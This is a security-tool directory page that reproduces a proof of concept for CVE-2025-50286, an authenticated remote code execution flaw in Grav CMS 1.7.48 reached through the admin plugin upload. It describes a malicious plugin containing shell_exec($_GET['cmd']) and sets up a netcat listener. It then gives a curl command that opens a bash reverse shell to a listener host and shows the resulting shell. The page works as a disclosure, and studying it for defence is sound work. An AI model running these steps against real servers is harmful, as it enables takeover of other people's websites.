Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-50286 | Kitploit
Tools/GitHubGitHub/binneko/cve-2025-50286
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubbinneko/cve-2025-50286

CVE-2025-50286

View Repository
211 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Grav CMS v1.7.48 / Admin Plugin v1.10.48 - Authenticated RCE via Plugin Upload (CVE-2025-50286)

Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Remote Code Execution (RCE) via the "Direct Install" plugin upload feature, allowing authenticated administrators to execute arbitrary PHP code on the server.

CVE ID

CVE-2025-50286

Summary

  • Type: Authenticated Remote Code Execution (RCE)
  • Location: /admin/tools/direct-install (Admin Panel > Tools > Direct Install)
  • Impact: Arbitrary PHP code execution and potential full system compromise
  • Authentication Required: Yes (Administrator access)
  • Affected Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48

Proof of Concept

  1. Prepare a listener:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Log in to the Grav Admin Panel as an administrator.

  3. Navigate to Tools > Direct Install

  4. Upload a malicious plugin ZIP (evilplugin.zip) structured as follows:

    root@kitploit:~
    evilplugin/
    ├── evilplugin.php         ← contains: shell_exec($_GET['cmd'])
    └── blueprints.yaml        ← minimal blueprint to pass validation
    
  5. Trigger the reverse shell:

    root@kitploit:~
    curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
    
  6. Reverse shell received:

    root@kitploit:~
    $ nc -lvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on <target-ip>
    www-data@target:/var/www/html$ whoami
    www-data
    

Affected Component

  • Endpoint: /admin/tools/direct-install
  • Functionality: Plugin upload and autoload without validation

Tested On

  • Debian 11
  • Apache2 + PHP 7.4
  • Grav CMS v1.7.48 (with Admin Plugin v1.10.48)

Discoverer

@binneko

References

  • Grav CMS GitHub
  • CVE Record - CVE-2025-50286

Disclaimer

For educational and defensive purposes only.

Download Tool